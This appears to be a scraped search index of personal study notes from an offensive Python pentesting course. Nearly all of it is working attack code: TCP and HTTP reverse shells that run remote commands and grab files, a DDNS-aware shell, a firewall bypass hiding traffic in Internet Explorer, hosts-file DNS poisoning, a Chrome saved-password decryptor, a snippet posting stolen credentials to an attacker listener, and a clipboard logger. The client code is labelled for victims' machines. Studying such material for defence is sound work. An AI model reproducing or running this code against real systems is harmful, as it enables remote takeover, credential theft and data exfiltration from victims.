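import struct\n\ndef send_file(sock, path):\n    data = open(path, 'rb').read()\n    sock.sendall(struct.pack('>Q', len(data)) + data) # 8-byte big-endian length, then the payload\n\ndef recv_exact(sock, n):\n    buf = b''\n    while len(buf) < n:\n        chunk = sock.recv(n - len(buf))\n        if not chunk:\n            raise ConnectionError('socket closed mid-transfer')\n        buf += chunk\n    return buf\n\ndef recv_file(sock, out_path):\n    size = struct.unpack('>Q', recv_exact(sock, 8))[0]\n    with open(out_path, 'wb') as f:\n        f.write(recv_exact(sock, size))\n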
              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-low-level-data-exfiltration-tcp/#using-pyinstaller","title":"Using pyinstaller","text":"

              See pyinstaller.

              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-reverse-shell-that-scans-ports/","title":"Coding a reverse shell that scans ports","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.

              ","tags":["python","python pentesting","scripting","reverse shell","port scanner"]},{"location":"python/coding-a-reverse-shell-that-scans-ports/#client-side","title":"Client side","text":"

              To be run on the victim's machine.

# Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\nimport os\nimport socket\nimport subprocess\n\ndef transfer(s, path):\n    if os.path.exists(path):\n        f = open(path, 'rb')\n        packet = f.read(1024)\n        while packet:\n            s.send(packet)\n            packet = f.read(1024)\n        s.send('DONE'.encode())\n        f.close()\n\ndef scanner(s, ip, ports):\n    scan_result = '' # scan_result is a variable that stores our scanning result\n    for port in ports.split(','):\n        try: # we will try to make a connection using the socket library for EACH one of these ports\n            sock =  socket.socket()\n# connect_ex returns 0 if the operation succeeded; in our case, success means the connection happened, which means the port is open. Otherwise the port could be closed, or the host is unreachable in the first place.\n            output = sock.connect_ex((ip, int(port)))\n            if output == 0:\n                scan_result = scan_result + \"[+] Port \" + port + \" is opened\" + \"\\n\"\n            else:\n                scan_result = scan_result + \"[-] Port \" + port + \" is closed\" + \"\\n\"\n            sock.close() # close the socket whether the port was open or closed\n        except Exception as e:\n            pass\n    s.send(scan_result.encode())\ndef connect():\n    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    s.connect(('192.168.0.152', 8080))\n    while True:\n        command = s.recv(1024)\n        if 'terminate' in command.decode():\n            s.close()\n            break\n        elif 'grab' in command.decode():\n            grab, path = command.decode().split('*')\n            try:\n                transfer(s, path)\n            except Exception as e: # bind the exception so we can report it back\n                s.send(str(e).encode())\n\n        elif 'scan' in command.decode(): # syntax: scan 10.10.10.100:22,80\n            command = command[5:].decode() # slice off the leading first 5 chars \n            ip, ports = command.split(':')\n            scanner(s, ip, ports)\n        else:\n            CMD = subprocess.Popen(command.decode(), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)\n            s.send(CMD.stdout.read())\n            s.send(CMD.stderr.read())\n\ndef main():\n    connect()\n\nmain()\n
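
From the attacker's Shell> prompt, the scan keyword drives this client-side scanner using the syntax from the comment; an illustrative exchange (made-up target and results):

Shell> scan 10.10.10.100:22,80\n[+] Port 22 is opened\n[-] Port 80 is closed\n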
              ","tags":["python","python pentesting","scripting","reverse shell","port scanner"]},{"location":"python/coding-a-reverse-shell-that-searches-files/","title":"Coding a reverse shell that searches files","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.

              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-reverse-shell-that-searches-files/#client-side","title":"Client side","text":"

To be run on the victim's machine.

import requests\nimport os\nimport subprocess\nimport time\n\nwhile True:\n    req = requests.get('http://192.168.0.152:8080')\n    command = req.text\n    if 'terminate' in command:\n        break\n    elif 'grab' in command:\n        grab, path = command.split(\"*\")\n        if os.path.exists(path):\n            url = \"http://192.168.0.152:8080/store\"\n            filer = {'file': open(path, 'rb')}\n            r = requests.post(url, files=filer)\n        else:\n            post_response = requests.post(url='http://192.168.0.152:8080', data='[-] Not able to find the file!'.encode())\n    elif 'search' in command: # The Formula is search <path>*.<file extension>  --> for example, say we got search C:\\\\*.pdf\n        command = command[7:] # cut off the first 7 characters; output would be  C:\\\\*.pdf\n        path, ext = command.split('*')\n        lists = '' # here we define a string where we will append our results\n\n# os.walk is a function that will navigate ALL the directories specified in the provided path and returns three values:\n# 1- dirpath is a string containing the path to the directory\n# 2- dirnames is a list of the names of the subdirectories in dirpath\n# 3- files is a list of the file names in dirpath\n\n# Once we have the files list, we check each file (using a for loop); if the file extension matches what we are looking for, we add the file path to the lists string.\n\n\n\n        for dirpath, dirname, files in os.walk(path):\n            for file in files:\n                if file.endswith(ext):\n                    lists = lists + '\\n' + os.path.join(dirpath, file)\n        requests.post(url='http://192.168.0.152:8080', data=lists)\n    else:\n        CMD = subprocess.Popen(command, shell=True,stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n        post_response = requests.post(url='http://192.168.0.152:8080', data=CMD.stdout.read())\n        post_response = requests.post(url='http://192.168.0.152:8080', data=CMD.stderr.read())\n    time.sleep(3)\n
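
The search keyword follows the formula from the comments (search <path>*.<file extension>); an illustrative exchange through the HTTP shell, with made-up paths:

Shell> search C:\\*.pdf\nC:\\Users\\Alex\\Documents\\report.pdf\nC:\\Users\\Alex\\Desktop\\invoice.pdf\n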
              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-tcp-reverse-shell/","title":"Coding a TCP connection and a reverse shell","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.

              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-tcp-reverse-shell/#basic-connection","title":"Basic connection","text":"

From the eJPT study module and the book Networking computers.

              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-tcp-reverse-shell/#client-side","title":"Client side","text":"

To be run on the victim's computer.

              from socket import *\nserverName = \"servername or ip\"\nserverPort = 12000\n\nclientSocket = socket(AF_INET, SOCK_STREAM)\nclientSocket.connect((serverName, serverPort))\n\nsentence = str(input(\"Enter a sentence in lower case: \"))\nclientSocket.send(sentence.encode())\nmodifiedSentence = clientSocket.recv(1024)\n\nprint(\"From server: \", modifiedSentence.decode())\nclientSocket.close()\n

              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-tcp-reverse-shell/#server-side","title":"Server side","text":"
              from socket import *\n\nserverPort = 12000\nserverSocket = socket(AF_INET, SOCK_STREAM)\n\nserverSocket.bind(('', serverPort))\nserverSocket.listen(1)\nprint(\"Server is ready to receive...\")\n\nwhile True:\n    connectionSocket, addr = serverSocket.accept()\n    sentence = connectionSocket.recv(1024).decode()\n    capitalizedsentence = sentence.upper()\n    connectionSocket.send(capitalizedsentence.encode())\n    connectionSocket.close()\n
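
Run the server first, then the client. The client sends a lowercase sentence and prints the uppercased reply; an illustrative client-side run:

Enter a sentence in lower case: hello world\nFrom server:  HELLO WORLD\n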
              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-tcp-reverse-shell/#reverse-tcp-connection","title":"Reverse TCP connection","text":"

From the course: Python For Offensive PenTest: A Complete Practical Course.

              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-tcp-reverse-shell/#client-side_1","title":"Client side","text":"

To be run on the victim's computer.

              # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nimport socket    # For Building TCP Connection\nimport subprocess # To start the shell in the system\n\ndef connect():\n    s = socket.socket()\n    s.connect(('10.0.2.6', 1234)) # Here we define the Attacker IP and the listening port\n\n    while True:\n        command = s.recv(1024) # keep receiving commands from the Kali machine, read the first KB of the tcp socket\n\n        if 'terminate' in command.decode(): # if we got terminate order from the attacker, close the socket and break the loop\n            s.close()\n            break\n        else:   # otherwise, we pass the received command to a shell process\n\n            CMD = subprocess.Popen(command.decode(), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n            s.send(CMD.stdout.read()) # send back the result\n            s.send(CMD.stderr.read()) # send back the error -if any-, such as syntax error\n\ndef main():\n    connect()\nmain()\n
              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-tcp-reverse-shell/#server-side_1","title":"Server side","text":"

To be run on the attacker's computer.

# Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nimport socket\n\ndef connect():\n\n    s = socket.socket()\n    s.bind((\"10.0.2.15\", 1234))\n    s.listen(1) # define the backlog size for the queue; I made it 1 as we are expecting a single connection from a single target\n    conn, addr = s.accept() # accept() will return the connection object ID (conn) and the client (target) IP address and source port in a tuple format (IP,port)\n    print ('[+] We got a connection from', addr)\n\n    while True:\n\n        command = input(\"Shell> \")\n\n        if 'terminate' in command: # If we got the terminate command, inform the client, close the connection and break the loop\n            conn.send('terminate'.encode())\n            conn.close()\n            break\n        elif command == '': # If the user just presses enter, we send a whoami command ('' in command would be True for every string, so we compare for equality instead)\n            conn.send('whoami'.encode()) \n            print( conn.recv(1024).decode()) \n        else:\n            conn.send(command.encode()) # Otherwise we send the command to the target\n            print( conn.recv(1024).decode()) # print the result that we got back\n\ndef main():\n    connect()\nmain()\n
              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-tcp-reverse-shell/#using-pyinstaller","title":"Using pyinstaller","text":"

              See pyinstaller.

              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-an-http-reverse-shell/","title":"Coding an http reverse shell","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.

              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-an-http-reverse-shell/#client-side","title":"Client side","text":"

To be run on the victim's computer.

              # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\nimport requests\nimport subprocess\nimport time\n\nwhile True:\n\n    req = requests.get('http://192.168.0.152:8080') # Send GET request to our kali server\n    command = req.text # Store the received txt into command variable\n\n    if 'terminate' in command:\n        break\n\n    else:\n        CMD = subprocess.Popen(command, shell=True,stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n        post_response = requests.post(url='http://192.168.0.152:8080', data=CMD.stdout.read()) # POST the result\n        post_response = requests.post(url='http://192.168.0.152:8080', data=CMD.stderr.read()) # or the error -if any-\n\n    time.sleep(3)\n
              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-an-http-reverse-shell/#server-side","title":"Server side","text":"

To be run on the attacker's computer.

# Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\nimport http.server\n\nHOST_NAME = \"192.168.0.152\" # our attacker machine (note: Python comments use #, not //)\nPORT_NUMBER = 8080 # attacker listening port\n\nclass MyHandler(http.server.BaseHTTPRequestHandler): # MyHandler defines what we should do when we receive a GET/POST\n\n    def do_GET(self):\n\n        command = input(\"Shell> \")\n        self.send_response(200)\n        self.send_header(\"Content-type\", \"text/html\")\n        self.end_headers()\n        self.wfile.write(command.encode())\n\n    def do_POST(self):\n\n        self.send_response(200)\n        self.end_headers()\n        length = int(self.headers['Content-length']) # the Content-length header tells how many bytes the HTTP POST body contains; the value has to be an integer\n        postVar = self.rfile.read(length)\n        print(postVar.decode())\n\nif __name__ == \"__main__\":\n\n    # We start a server_class and create an httpd object, passing our kali IP, port number and class handler (MyHandler)\n    server_class = http.server.HTTPServer\n    httpd = server_class((HOST_NAME, PORT_NUMBER), MyHandler)\n    try:\n        httpd.serve_forever() # start the HTTP server; if we get ctrl+c we will interrupt and stop the server\n    except KeyboardInterrupt:\n        print('[!] Server is terminated')\n        httpd.server_close()\n
              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/ddns-aware-shell/","title":"Coding a DDNS aware shell","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.


When coding a reverse shell you don't need to hardcode the IP address of the attacker machine. Instead, you can use a Dynamic DNS service such as https://www.noip.com/. To keep this service informed of the attacker's public IP address, we install a Linux dynamic update client on our Kali machine (an agent that does the trick).

See noip to learn how to install a Linux dynamic update client on the attacker machine.

              After installing the agent, let's see the modification needed on the client side of the TCP reverse shell.

              ","tags":["python","python pentesting","scripting","ddns","reverse shell"]},{"location":"python/ddns-aware-shell/#client-side","title":"Client side","text":"
# Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nimport socket\nimport subprocess\nimport os\n\ndef transfer(s, path):\n    if os.path.exists(path):\n        f = open(path, 'rb')\n        packet = f.read(1024)\n        while len(packet) > 0:\n            s.send(packet)\n            packet = f.read(1024)\n        s.send('DONE'.encode())\n    else:\n        s.send('File not found'.encode())\ndef connecting(ip):\n    s = socket.socket()\n    s.connect((ip, 8080))\n\n    while True:\n        command = s.recv(1024)\n\n        if 'terminate' in command.decode():\n            s.close()\n            break\n\n        elif 'grab' in command.decode():\n            grab, path = command.decode().split(\"*\")\n            try:\n                transfer(s, path)\n            except:\n                pass\n        else:\n            CMD = subprocess.Popen(command.decode(), shell=True,stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n            s.send(CMD.stderr.read())\n            s.send(CMD.stdout.read())\ndef main():\n    ip = socket.gethostbyname('cared.ddns.net') # resolve the DDNS hostname to the attacker's current public IP\n    print (ip)\n    connecting(ip)\nmain()\n
              ","tags":["python","python pentesting","scripting","ddns","reverse shell"]},{"location":"python/dns-poisoning/","title":"DNS poisoning","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.


1. Add a new line to the Windows hosts file containing the attacker IP and a URL

echo 10.10.120.12 google.com >> c:\Windows\System32\drivers\etc\hosts\n

2. Flush the DNS cache to make sure the updated record is used

              ipconfig /flushdns\n

              Now traffic will be redirected to the attacker machine.
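
To confirm the poisoned record is in effect, resolving the name locally should now return the attacker's IP. A quick check, using the IP from step 1:

import socket\n\n# After the hosts-file entry and the flushdns, this should print the attacker IP (10.10.120.12)\nprint(socket.gethostbyname('google.com'))\n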

              ","tags":["python","python pentesting","techniques","DNS poisoning"]},{"location":"python/dns-poisoning/#python-script-for-dns-poisoning","title":"Python script for DNS poisoning","text":"
import subprocess\nimport os\n\nos.chdir(r\"C:\Windows\System32\drivers\etc\") # raw string so the backslashes are not treated as escape sequences\n\ncommand = \"echo 10.10.10.100 www.google.com >> hosts\"\n\nCMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)\nCMD.communicate() # wait for the hosts entry to be written before flushing the cache\n\ncommand = \"ipconfig /flushdns\"\n\nCMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)\nCMD.communicate()\n
              ","tags":["python","python pentesting","techniques","DNS poisoning"]},{"location":"python/dumping-chrome-saved-passwords/","title":"Dumping saved passwords from Google Chrome","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.

              ","tags":["python","python pentesting","scripting","keylogger"]},{"location":"python/dumping-chrome-saved-passwords/#how-does-chrome-saved-passwords-work","title":"How does Chrome saved passwords work?","text":"

Chrome uses the Windows session password to encrypt and decrypt saved passwords. Encrypted passwords are stored in an SQLite database called 'Login Data', located at:

              C:\\Users\\%USERNAME%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\n

Chrome calls the Windows API function \"CryptProtectData\", which derives the encryption key from the Windows login credentials, and, for the reverse operation, the Windows API function \"CryptUnprotectData\" to decrypt the password value back to clear text.
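
Because CryptProtectData and CryptUnprotectData are a symmetric pair tied to the logged-in user, a quick round trip shows the mechanism. A minimal sketch, assuming the pywin32 package and the same Windows session:

import win32crypt\n\nblob = win32crypt.CryptProtectData(b'secret', 'demo', None, None, None, 0) # encrypt under the current user's DPAPI key\ndesc, clear = win32crypt.CryptUnprotectData(blob, None, None, None, 0) # decrypt; returns a (description, data) tuple\nprint(desc, clear) # demo b'secret'\n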

1. Install DB Browser for SQLite from: https://sqlitebrowser.org/dl/

2. Open DB Browser for SQLite.

3. In Windows Explorer, go to the path where the SQLite DB is stored and copy the \"Login Data\" file to your Desktop.

4. Change the extension of the \"Login Data\" file to .sqlite3.

              5. Open \"Login Data.sqlite3\" in DB Browser sqlite.

              6. Go to tab \"Browse Data\" (Hoja de Datos in spanish) and select the table login. There you have all stored passwords.

              ","tags":["python","python pentesting","scripting","keylogger"]},{"location":"python/dumping-chrome-saved-passwords/#our-script","title":"Our script","text":"

              The route map for this script will be:

1. Guess the path to the SQLite database from the username and the browser used by the victim:

              C:\\Users\\%USERNAME%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\n

2. Send the password_value column from the \"logins\" table in \"Login Data.sqlite3\" to the CryptUnprotectData function.

              3. Send the passwords through a reverse shell.

              ","tags":["python","python pentesting","scripting","keylogger"]},{"location":"python/dumping-chrome-saved-passwords/#script-for-gathering-passwords","title":"Script for gathering passwords","text":"

Here is the script provided in the course. It no longer works: since Chrome 80, passwords are encrypted with AES-GCM under a master key that is itself protected with DPAPI, so calling CryptUnprotectData directly on the password blob fails. Below I've pasted a different script that works:

              # Python For Offensive PenTest: A Complete Practical Course  - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nfrom os import getenv \n# To find out the Chrome SQL path- C:\\Users\\%USERNAME%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data\n\nimport sqlite3 # To read the Chrome SQLite DB\n\nimport win32crypt  # High level library to call windows API CryptUnprotectData\n\nfrom shutil import copyfile # To make a copy of the Chrome SQLite DB\n\n\n# LOCALAPPDATA is a Windows Environment Variable which points to >>> C:\\Users\\{username}\\AppData\\Local\npath = getenv(\"LOCALAPPDATA\")+r\"\\Google\\Chrome\\User Data\\Default\\Login Data\"\n\n# make a copy the Login Data DB and pull data out of the copied DB, so there are no conflicts in case that the user is using the original (maybe she is logged into facebook, let's say)\npath2 = getenv(\"LOCALAPPDATA\")+r\"\\Google\\Chrome\\User Data\\Default\\Login2\"\ncopyfile(path, path2)\n\n# Connect to the copied Database\nconn = sqlite3.connect(path2)\n\n\ncursor = conn.cursor() #Create a Cursor object and call its execute() method to perform SQL commands like SELECT\n\n# SELECT column_name,column_name FROM table_name\n# SELECT action_url and username_value and password_value FROM table logins\ncursor.execute('SELECT action_url, username_value, password_value FROM logins')\n\n\n# To retrieve data after executing a SELECT statement, we call fetchall() to get a list of the matching rows.\nfor raw in cursor.fetchall():\n\n    print(raw[0] + '\\n' + raw[1]) # print the action_url (raw[0]) and print the username_value (raw[1])\n\n    password = win32crypt.CryptUnprotectData(raw[2])[1] # pass the encrypted Password to CryptUnprotectData API function to decrypt it  \n\n    print(password)\nconn.close()\n

Script that works. These are the requirements:

              pip install PyCryptodome\n

              Script:

              import os\nimport json\nimport base64\nimport sqlite3\nimport win32crypt\nfrom Crypto.Cipher import AES\nimport shutil\n\ndef get_master_key():\n    with open(os.environ['USERPROFILE'] + os.sep + r'AppData\\Local\\Google\\Chrome\\User Data\\Local State', \"r\") as f:\n        local_state = f.read()\n        local_state = json.loads(local_state)\n    master_key = base64.b64decode(local_state[\"os_crypt\"][\"encrypted_key\"])\n    master_key = master_key[5:]  # removing DPAPI\n    master_key = win32crypt.CryptUnprotectData(master_key, None, None, None, 0)[1]\n    return master_key\n\ndef decrypt_payload(cipher, payload):\n    return cipher.decrypt(payload)\n\ndef generate_cipher(aes_key, iv):\n    return AES.new(aes_key, AES.MODE_GCM, iv)\n\ndef decrypt_password(buff, master_key):\n    try:\n        iv = buff[3:15]\n        payload = buff[15:]\n        cipher = generate_cipher(master_key, iv)\n        decrypted_pass = decrypt_payload(cipher, payload)\n        decrypted_pass = decrypted_pass[:-16].decode()  # remove suffix bytes\n        return decrypted_pass\n    except Exception as e:\n        # print(\"Probably saved password from Chrome version older than v80\\n\")\n        # print(str(e))\n        return \"Chrome < 80\"\n\n\nmaster_key = get_master_key()\nlogin_db = os.environ['USERPROFILE'] + os.sep + r'AppData\\Local\\Google\\Chrome\\User Data\\default\\Login Data'\nshutil.copy2(login_db, \"Loginvault.db\") #making a temp copy since Login Data DB is locked while Chrome is running\nconn = sqlite3.connect(\"Loginvault.db\")\ncursor = conn.cursor()\ntry:\n    cursor.execute(\"SELECT action_url, username_value, password_value FROM logins\")\n    for r in cursor.fetchall():\n        url = r[0]\n        username = r[1]\n        encrypted_password = r[2]\n        decrypted_password = decrypt_password(encrypted_password, master_key)\n        if len(username) > 0:\n            print(\"URL: \" + url + \"\\nUser Name: \" + username + \"\\nPassword: \" + decrypted_password + \"\\n\" + \"*\" * 50 + \"\\n\")\nexcept Exception as e:\n    pass\ncursor.close()\nconn.close()\ntry:\n    os.remove(\"Loginvault.db\")\nexcept Exception as e:\n    pass\n
              ","tags":["python","python pentesting","scripting","keylogger"]},{"location":"python/dumping-chrome-saved-passwords/#script-with-gathering-passwords-phase-integrated-in-a-reverse-shell","title":"Script with gathering passwords phase integrated in a reverse shell","text":"
              # Python For Offensive PenTest: A Complete Practical Course  - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\nimport json\nimport base64\nfrom os import getenv \n# To find out the Chrome SQL path- C:\\Users\\%USERNAME%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data\n\nimport sqlite3 # To read the Chrome SQLite DB\nfrom Crypto.Cipher import AES\nimport win32crypt  # High level library to call windows API CryptUnprotectData\n\nfrom shutil import copyfile # To make a copy of the Chrome SQLite DB\n\n\n# LOCALAPPDATA is a Windows Environment Variable which points to >>> C:\\Users\\{username}\\AppData\\Local\npath = getenv(\"LOCALAPPDATA\")+r\"\\Google\\Chrome\\User Data\\Default\\Login Data\"\n\n# make a copy the Login Data DB and pull data out of the copied DB\npath2 = getenv(\"LOCALAPPDATA\")+r\"\\Google\\Chrome\\User Data\\Default\\Login2\"\ncopyfile(path, path2)\n\n# Connect to the copied Database\nconn = sqlite3.connect(path2)\n\n\ncursor = conn.cursor() #Create a Cursor object and call its execute() method to perform SQL commands like SELECT\n\n# SELECT column_name,column_name FROM table_name\n# SELECT action_url and username_value and password_value FROM table logins\ncursor.execute('SELECT action_url, username_value, password_value FROM logins')\n\n\n# To retrieve data after executing a SELECT statement, we call fetchall() to get a list of the matching rows.\nfor raw in cursor.fetchall():\n\n    print(raw[0] + '\\n' + raw[1]) # print the action_url (raw[0]) and print the username_value (raw[1])\n\n    password = win32crypt.CryptUnprotectData(raw[2])[1] # pass the encrypted Password to CryptUnprotectData API function to decrypt it  \n\n    print(password)\nconn.close()\n
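
Note that the block above only covers the gathering phase; nothing actually leaves the machine. A minimal sketch of the missing exfiltration step, reusing the HTTP shell pattern from earlier chapters (the 192.168.0.152:8080 listener) and assuming the results have been collected into a string instead of printed:

import requests\n\nresults = 'action_url / username / password lines collected by the script above' # placeholder for the collected output\n\n# POST the harvested credentials to the attacker's HTTP listener, just as the HTTP shell does with command output\nrequests.post(url='http://192.168.0.152:8080', data=results.encode())\n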
              ","tags":["python","python pentesting","scripting","keylogger"]},{"location":"python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/","title":"Hickjack the Internet Explorer process to bypass an host-based firewall","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.


For our script to bypass a host-based firewall (based on an ACL), we will hijack the Internet Explorer process to conceal our traffic and get through.

              ","tags":["python","python pentesting","scripting","reverse shell","bypassing techniques","host based firewall"]},{"location":"python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/#client-side","title":"Client side","text":"

Make sure that the victim machine (a Windows 10 box) has these two Python libraries installed: pypiwin32 and pywin32.

To be run on the victim's machine.

# Python For Offensive PenTest: A Complete Practical Course  - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\nfrom win32com.client import Dispatch\nfrom time import sleep\nimport subprocess\n\nie = Dispatch(\"InternetExplorer.Application\") # Create browser instance.\nie.Visible = 0 # Make it invisible [ run in background ] (1= visible)\n\n# Parameters for POST\ndURL = \"http://192.168.0.152\"  \nFlags = 0\nTargetFrame = 0\n\n\nwhile True:\n    ie.Navigate(\"http://192.168.0.152\") # Navigate to our kali web server (the attacker machine) to grab the hacker commands\n    while ie.ReadyState != 4: # Wait for browser to finish loading.\n        sleep(1)\n\n    command = ie.Document.body.innerHTML \n    command = command.encode() # encode the command\n    if 'terminate' in command.decode():\n        ie.Quit() # quit IE and end the process\n        break\n    else:\n        CMD = subprocess.Popen(command.decode(), shell=True, stdin=subprocess.PIPE, stderr=subprocess.PIPE, stdout=subprocess.PIPE)\n        Data = CMD.stdout.read()\n        PostData = memoryview( Data ) # in order to submit or post data using the COM technique, the data first has to be buffered using memoryview\n        ie.Navigate(dURL, Flags, TargetFrame, PostData) # we post the command execution result along with the POST parameters which we defined earlier\n\n    sleep(3)\n
              ","tags":["python","python pentesting","scripting","reverse shell","bypassing techniques","host based firewall"]},{"location":"python/hijacking-keepass/","title":"Hijacking Keepass Password Manager","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.

              General index of the course
              # Python For Offensive PenTest: A Complete Practical Course- All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\n#pip install pyperclip\n\nimport pyperclip \nimport time\n\nclipboard_history = [] # a list that will store the clipboard contents\n\nwhile True: # infinite loop to continuously check the clipboard\n\n    if pyperclip.paste(): # if the clipboard content is not empty ...\n        value = pyperclip.paste() # ... take its value and put it into a variable called value\n\n        # to avoid replicated items in our list, check whether the value was stored earlier;\n        # if not, this is a new item and we append it to our list\n        if value not in clipboard_history:\n            clipboard_history.append(value)\n\n        print(clipboard_history)\n\n    time.sleep(3)\n
              ","tags":["python","python pentesting","scripting","keylogger"]},{"location":"python/including-cd-command-into-tcp-reverse-shell/","title":"Including cd command into TCP reverse shell","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.

              General index of the course
              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/including-cd-command-into-tcp-reverse-shell/#client-side","title":"Client side","text":"

              To be run on the victim's computer.

              # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nimport socket\nimport subprocess\nimport os\n\ndef transfer(s, path):\n    if os.path.exists(path):\n        f = open(path, 'rb')\n        packet = f.read(1024)\n        while packet:\n            s.send(packet)\n            packet = f.read(1024)\n        s.send('DONE'.encode())\n        f.close()\n    else:\n        s.send('Unable to find the file'.encode())\n\ndef connect():\n    s = socket.socket()\n    s.connect(('192.168.0.152', 8080))\n    while True:\n        command = s.recv(1024)\n        if 'terminate' in command.decode():\n            s.close()\n            break\n        elif 'grab' in command.decode():\n            grab, path = command.decode().split('*')\n            try:\n                transfer(s, path)\n            except Exception as e:\n                s.send(str(e).encode())\n                pass\n        elif 'cd' in command.decode():\n            code, directory = command.decode().split('*') # the expected syntax is: cd*directory\n            try:\n                os.chdir(directory) # change the working directory \n            except Exception as e:\n                s.send(('[-]  ' + str(e)).encode())\n            else:\n                s.send(('[+] CWD is ' + os.getcwd()).encode()) # send back a string with the new current working directory (CWD)\n        else:\n            CMD = subprocess.Popen(command.decode(), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)\n            s.send(CMD.stdout.read())\n            s.send(CMD.stderr.read())\n\ndef main():\n    connect()\n\nmain()\n
              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/including-cd-command-into-tcp-reverse-shell/#server-side","title":"Server side","text":"

              To be run on the attacker's computer.

              # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nimport socket\n\ndef connect():\n\n    s = socket.socket()\n    s.bind((\"10.0.2.15\", 1234))\n    s.listen(1) # define the backlog size for the queue; 1 because we are expecting a single connection from a single client\n    conn, addr = s.accept() # accept() returns the connection object (conn) and the client's (target's) IP address and source port as a tuple (IP, port)\n    print ('[+] We got a connection from', addr)\n\n    while True:\n\n        command = input(\"Shell> \")\n\n        if 'terminate' in command: # on a terminate command, inform the client, close the connection and break the loop\n            conn.send('terminate'.encode())\n            conn.close()\n            break\n        elif command == '': # if the user just presses Enter, send a whoami command\n            conn.send('whoami'.encode()) \n            print( conn.recv(1024).decode()) \n        else:\n            conn.send(command.encode()) # otherwise send the command to the target\n            print( conn.recv(1024).decode()) # print the result that we got back\n\ndef main():\n    connect()\nmain()\n
              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/including-cd-command-into-tcp-reverse-shell/#using-pyinstaller","title":"Using pyinstaller","text":"

              See pyinstaller.

              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/making-a-screenshot/","title":"Making a screenshot","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.

              General index of the course
              ","tags":["python","python pentesting","scripting","reverse shell","screenshot capturer"]},{"location":"python/making-a-screenshot/#client-side","title":"Client side","text":"

              To be run on the victim's machine.

